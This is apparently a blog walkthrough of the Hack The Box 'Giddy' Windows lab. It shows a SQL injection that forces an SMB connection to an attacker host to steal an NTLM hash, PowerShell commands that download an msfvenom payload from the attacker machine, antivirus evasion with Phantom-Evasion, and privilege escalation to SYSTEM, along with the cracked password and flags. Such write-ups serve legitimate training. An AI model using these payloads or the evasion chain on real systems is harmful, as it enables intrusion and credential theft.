Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Giddy Windows

Published on 24 Oct 2019

Tools and techniques used, powershell, phanton evasion, burpsuite

Recon

Nmap scan

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Gobuster

Under the remote directory we locate a windows 2016 server access page

On the mvc directory we locate a web app running

Exploitation Method 1 SQL Injection and BURPSUITE

After a little of trial and error we find out that the web app is vuln to SQLinjection:

caps--

We start Burpsuite and we made the following search request to the server “cap–”

We capture the request with Burpsuite and modified to

' EXEC master.sys.xp_dirtree'\\10.10.14.34\share--

Then we forward the request We run Responder with the -I tun0 option to set up a smbserver to capture NetNTLM hash

Finally we use John to crack the hash

Stacy : xNnWo6272k7x 

We use the obtained creds to login into the remote directory

Privilege Escalation Ubiquiti and Phantom evasion

An find a program called Ubiquiti Unifi Video installed. this program is vulnerable to local priv-esc CVE-2016-6914

We create a msfvenom shell and uploaded to the target machine.

powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe" 

However antivirus detects our malicius shell and blocks its execution. So to overcome this. We download and install Phantom-evasion

https://github.com/oddcod3/Phantom-Evasion

We create and upload to our target machine a x64 bit msfvenom payload “taskkill.exe”

powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe" 

We proceed to set up multi/handler to catch out shell

We type Stop-Service “Ubiquiti Unifi Video” to shutdown the program Then we use Start-Service Ubiquiti Unifi Video” to restart the program

Finally we obtain a “NT Authority\system” shell

Exploitation Method 2 MSF

Microsoft SQL Server SQLi NTLM Stealer

use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli

SMB CAPTURE MODULE

use auxiliary/server/capture/smb

USE JOHN TO CRACK THE HASHED PASSWORDS IN FORMAT:netntlmv2

Stacy : xNnWo6272k7x 

FLAGS

Root  CF559C6C121F683BF3E56891E80641B1 
User  10C1C275385280605E96ADD808C1A0AD 

HTB Giddy Windows

Recon

Exploitation Method 1 SQL Injection and BURPSUITE

Privilege Escalation Ubiquiti and Phantom evasion

Exploitation Method 2 MSF

FLAGS

Related posts

Threat Intelligence Resources

Theat Hunting Tools

Threat Hunting Report